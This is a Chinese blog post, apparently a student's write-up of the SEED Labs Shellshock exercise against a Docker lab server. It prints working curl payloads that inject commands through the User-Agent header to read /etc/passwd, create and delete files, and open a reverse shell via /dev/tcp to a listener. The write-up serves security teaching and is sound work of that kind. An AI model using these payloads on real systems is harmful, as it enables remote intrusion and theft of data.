<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sekla.cn","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="背景​    2014年Bash程序被发现存在一个严重的安全漏洞问题，利用Shellshock漏洞可以在被影响的服务器上执行任何命令。 原因是Bash源代码中一个读取环境变量值的函数并把环境变量值转换成函数，只判断了值的头，但是没有判断值的尾部，所以直接在尾部添加攻击语句就能执行语句。">
<meta property="og:type" content="article">
<meta property="og:title" content="Seed安全实验系列-(2)-ShellShock实验">
<meta property="og:url" content="http://sekla.cn/2021/10/27/ss-lab2-shellshock/index.html">
<meta property="og:site_name" content="Sekla&#39;s Blog">
<meta property="og:description" content="背景​    2014年Bash程序被发现存在一个严重的安全漏洞问题，利用Shellshock漏洞可以在被影响的服务器上执行任何命令。 原因是Bash源代码中一个读取环境变量值的函数并把环境变量值转换成函数，只判断了值的头，但是没有判断值的尾部，所以直接在尾部添加攻击语句就能执行语句。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/10/27/GHAilOmrDE3NnpP.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/LBw5WASnO1H2PbF.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/6yWjwLeAi1vFk8s.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/uQVHmitJfbCoTs3.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/6HbfZcJAIwqhBQg.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/etlgqOYowDM1NxG.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/sLjROJ7ESlGZoNa.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/HDuvpJIC7zw9Lqh.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/RwjKGp4ex3tzuIX.png">
<meta property="og:image" content="https://i.loli.net/2021/10/27/CvK5ruS6JoYehXm.png">
<meta property="article:published_time" content="2021-10-27T04:00:00.000Z">
<meta property="article:modified_time" content="2021-10-27T04:49:06.110Z">
<meta property="article:author" content="Sekla">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/10/27/GHAilOmrDE3NnpP.png">

<link rel="canonical" href="http://sekla.cn/2021/10/27/ss-lab2-shellshock/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Seed安全实验系列-(2)-ShellShock实验 | Sekla's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <script type="text/javascript" src="/js/my_js/clicklove.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sekla's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Keep Learning Keep Doing</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">23</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">100</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://sekla.cn/2021/10/27/ss-lab2-shellshock/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Sekla">
      <meta itemprop="description" content="Sekla">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sekla's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Seed安全实验系列-(2)-ShellShock实验
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-10-27 12:00:00 / 修改时间：12:49:06" itemprop="dateCreated datePublished" datetime="2021-10-27T12:00:00+08:00">2021-10-27</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">软件安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/Seed%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E7%B3%BB%E5%88%97/" itemprop="url" rel="index"><span itemprop="name">Seed安全实验系列</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h2><p>​    2014年Bash程序被发现存在一个严重的安全漏洞问题，利用Shellshock漏洞可以在被影响的服务器上执行任何命令。</p>
<p>原因是Bash源代码中一个读取环境变量值的函数并把环境变量值转换成函数，只判断了值的头，但是没有判断值的尾部，所以直接在尾部添加攻击语句就能执行语句。</p>
<a id="more"></a>

<h2 id="构建被攻击环境"><a href="#构建被攻击环境" class="headerlink" title="构建被攻击环境"></a>构建被攻击环境</h2><p>实验提供Labsetup.zip来构建部分环境和设置docker容器，运用docker compose来快速构建。</p>
<p>输入<code>docker-compose -f docker-compose.yml build</code>构建，<code>docker-compose up</code>来运行容器。</p>
<p>ctrl+c可以停止命令。</p>
<p>构建配置文件为docker-compose.yml</p>
<h2 id="实验任务"><a href="#实验任务" class="headerlink" title="实验任务"></a>实验任务</h2><h3 id="Task1"><a href="#Task1" class="headerlink" title="Task1"></a>Task1</h3><p>体验bash函数，由于shellshock漏洞早就被修复，所以需要使用实验特定的shellshock漏洞bash来进行实验。将安装包中的bash_shellshock移动到bn目录下。</p>
<p>首先运行指定Bash然后设计实验验证是否能够攻击。</p>
<p>运行指令：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> foo=<span class="string">&#x27;() &#123; echo &quot;hello world&quot;; &#125;; echo &quot;extra&quot;;&#x27;</span></span><br><span class="line">bash_shellshock</span><br></pre></td></tr></table></figure>

<p>shell中打印出extra。</p>
<p><img src="https://i.loli.net/2021/10/27/GHAilOmrDE3NnpP.png"></p>
<h3 id="Task2"><a href="#Task2" class="headerlink" title="Task2"></a>Task2</h3><p>CGI（common gateway interface）通用网关接口，该程序可以通过网页运行各种后台程序，如shell、python、c等， apache默认是支持CGI的通过环境变量来向bash传递数据，实验提供了CGI程序来帮助识别什么用户数据可以传递到环境变量。这个CGI程序打印它所有的环境变量。</p>
<h4 id="A-使用浏览器"><a href="#A-使用浏览器" class="headerlink" title="A.使用浏览器"></a>A.使用浏览器</h4><p>使用浏览器来访问CGI程序可以看到实验指导下的内容，现在看看什么环境变量被浏览器设定，可以打开浏览器的HTTP HEADER LIVE去捕获HTTP请求，比较在服务器上的环境变量和获取的请求。</p>
<p>打开容器之后启动VNC。打开浏览器输入地址：<code>http://10.9.0.80/cgi-bin/getenv.cgi</code></p>
<p>环境变量被打印：</p>
<p><img src="https://i.loli.net/2021/10/27/LBw5WASnO1H2PbF.png"></p>
<p>打开F12查看html request header：</p>
<p><img src="https://i.loli.net/2021/10/27/6yWjwLeAi1vFk8s.png"></p>
<h4 id="B-使用curl指令"><a href="#B-使用curl指令" class="headerlink" title="B.使用curl指令"></a>B.使用curl指令</h4><p>curl指令参数-v 可以打印http request header，-A，-e，-H可以设定一些变量在header requset中。</p>
<p>-A可以修改User-Agent字段：</p>
<p><img src="https://i.loli.net/2021/10/27/uQVHmitJfbCoTs3.png"></p>
<p>-e可以修改referer字段</p>
<p><img src="https://i.loli.net/2021/10/27/6HbfZcJAIwqhBQg.png"></p>
<p>-H可以自定义字段：</p>
<p><img src="https://i.loli.net/2021/10/27/etlgqOYowDM1NxG.png"></p>
<h3 id="Task3"><a href="#Task3" class="headerlink" title="Task3"></a>Task3</h3><p>准备shellshock攻击，攻击不依靠CGI程序的具体内容，攻击目标是bash程序，web向apache发送cgi请求时，Apache会调用fork()函数新建一个进程，然后使用exec()函数族中的某个函数在新进程中执行cgi程序。因为cgi程序以”#!/bin/bash”开头，因此该程序是一个shell脚本，实际执行的是/bin/bash。</p>
<p>通过对<code>http://www.seedlab-shellshock.com/cgi-bin/vul.cgi</code>url进行攻击，</p>
<h4 id="A"><a href="#A" class="headerlink" title="A."></a>A.</h4><p>需要获取服务器返回的/etc/passwd密码内容。</p>
<p>直接输入<code>curl -A &quot;() &#123; echo hello;&#125;; echo Content_type: text/plain; echo; /bin/cat /etc/passwd&quot; http://10.9.0.80/cgi-bin/vul.cgi</code></p>
<p>来调用cat程序来查看passwd文件，并将其返回。</p>
<p><img src="https://i.loli.net/2021/10/27/sLjROJ7ESlGZoNa.png"></p>
<h4 id="B"><a href="#B" class="headerlink" title="B."></a>B.</h4><p>返回服务器目前进程的用户id，使用id指令即可，即bin/id。</p>
<p><img src="https://i.loli.net/2021/10/27/HDuvpJIC7zw9Lqh.png"></p>
<h4 id="C"><a href="#C" class="headerlink" title="C."></a>C.</h4><p>在服务器/tmp目录下创建一个文件。</p>
<p>输入<code>curl -A &quot;() &#123; echo hello;&#125;; echo Content_type: text/plain; echo; /bin/touch /tmp/myfile&quot; http://10.9.0.80/cgi-bin/vul.cgi</code></p>
<p>然后查看</p>
<p><img src="https://i.loli.net/2021/10/27/RwjKGp4ex3tzuIX.png"></p>
<h4 id="D"><a href="#D" class="headerlink" title="D."></a>D.</h4><p>删除刚刚创建的文件：</p>
<p><code>curl -A &quot;() &#123; echo hello;&#125;; echo Content_type: text/plain; echo; /bin/rm /tmp/myfile&quot; http://10.9.0.80/cgi-bin/vul.cgi</code></p>
<h4 id="Q1"><a href="#Q1" class="headerlink" title="Q1:"></a>Q1:</h4><p>是否能够窃取影子文件/etc/shadow的内容。显然task3.b看出使用bash的进程id，权限不足所以无法查看。</p>
<h4 id="Q2"><a href="#Q2" class="headerlink" title="Q2:"></a>Q2:</h4><p>http请求通常携带数据在url连接的 ? 符号之后，这个可以成为另外一个攻击方式，实际上是改变QUERY_STRING字段。</p>
<h3 id="Task4"><a href="#Task4" class="headerlink" title="Task4"></a>Task4</h3><p>获取反向shell，反向shell把标准输入输出输出错误设备重定向到网络连接，shell从连接获取输入，并且将输出也打印出来，要建立双向的tcp连接。</p>
<p>使用netcat -l指令可以变成一个tcp服务器监听特别的端口连接，服务器程序仅仅打印出来被client发送的东西，然后发送回client，实验监听端口9090。</p>
<p><img src="https://i.loli.net/2021/10/27/CvK5ruS6JoYehXm.png"></p>
<p>宿主机器之后，进行攻击，<code>curl -A &quot;() &#123; echo hello;&#125;; echo Content_type: text/plain; echo; echo; /bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1&quot; http://10.9.0.80/cgi-bin/vul.cgi</code></p>
<p>宿主机获取到了shell。</p>
<p>其中-i为进入可交互模式，0&lt;&amp;1 0是标准输入设备，将标准输入用作标准输出，输出重定向到tcp连接。</p>
<p>2&gt;&amp;1标准错误也重定向到标准输出。</p>
<h3 id="Task5"><a href="#Task5" class="headerlink" title="Task5"></a>Task5</h3><p>使用修复的bash来进行攻击。</p>
<p>修改一下Dockerfile然后把/bin/bash复制过来构建容器。</p>

    </div>
    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/10/25/leetcode26.27/" rel="prev" title="LeetCode26-27:删除有序数组中的重复项和移除元素">
      <i class="fa fa-chevron-left"></i> LeetCode26-27:删除有序数组中的重复项和移除元素
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/10/27/moderncpp-3/" rel="next" title="现代C++-初始化列表与元组，结构化绑定">
      现代C++-初始化列表与元组，结构化绑定 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%83%8C%E6%99%AF"><span class="nav-number">1.</span> <span class="nav-text">背景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%84%E5%BB%BA%E8%A2%AB%E6%94%BB%E5%87%BB%E7%8E%AF%E5%A2%83"><span class="nav-number">2.</span> <span class="nav-text">构建被攻击环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E4%BB%BB%E5%8A%A1"><span class="nav-number">3.</span> <span class="nav-text">实验任务</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Task1"><span class="nav-number">3.1.</span> <span class="nav-text">Task1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task2"><span class="nav-number">3.2.</span> <span class="nav-text">Task2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#A-%E4%BD%BF%E7%94%A8%E6%B5%8F%E8%A7%88%E5%99%A8"><span class="nav-number">3.2.1.</span> <span class="nav-text">A.使用浏览器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#B-%E4%BD%BF%E7%94%A8curl%E6%8C%87%E4%BB%A4"><span class="nav-number">3.2.2.</span> <span class="nav-text">B.使用curl指令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task3"><span class="nav-number">3.3.</span> <span class="nav-text">Task3</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#A"><span class="nav-number">3.3.1.</span> <span class="nav-text">A.</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#B"><span class="nav-number">3.3.2.</span> <span class="nav-text">B.</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#C"><span class="nav-number">3.3.3.</span> <span class="nav-text">C.</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#D"><span class="nav-number">3.3.4.</span> <span class="nav-text">D.</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Q1"><span class="nav-number">3.3.5.</span> <span class="nav-text">Q1:</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Q2"><span class="nav-number">3.3.6.</span> <span class="nav-text">Q2:</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task4"><span class="nav-number">3.4.</span> <span class="nav-text">Task4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task5"><span class="nav-number">3.5.</span> <span class="nav-text">Task5</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Sekla"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Sekla</p>
  <div class="site-description" itemprop="description">Sekla</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">100</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ShenTiao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ShenTiao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:584892986@qq.com" title="E-Mail → mailto:584892986@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1416875904&auto=0&height=66"></iframe>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sekla</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">288k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:22</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":250,"height":500},"mobile":{"show":false},"react":{"opacity":0.9},"log":false});</script></body>
</html>

<script type="text/javascript" src="/js/src/love.js"></script>
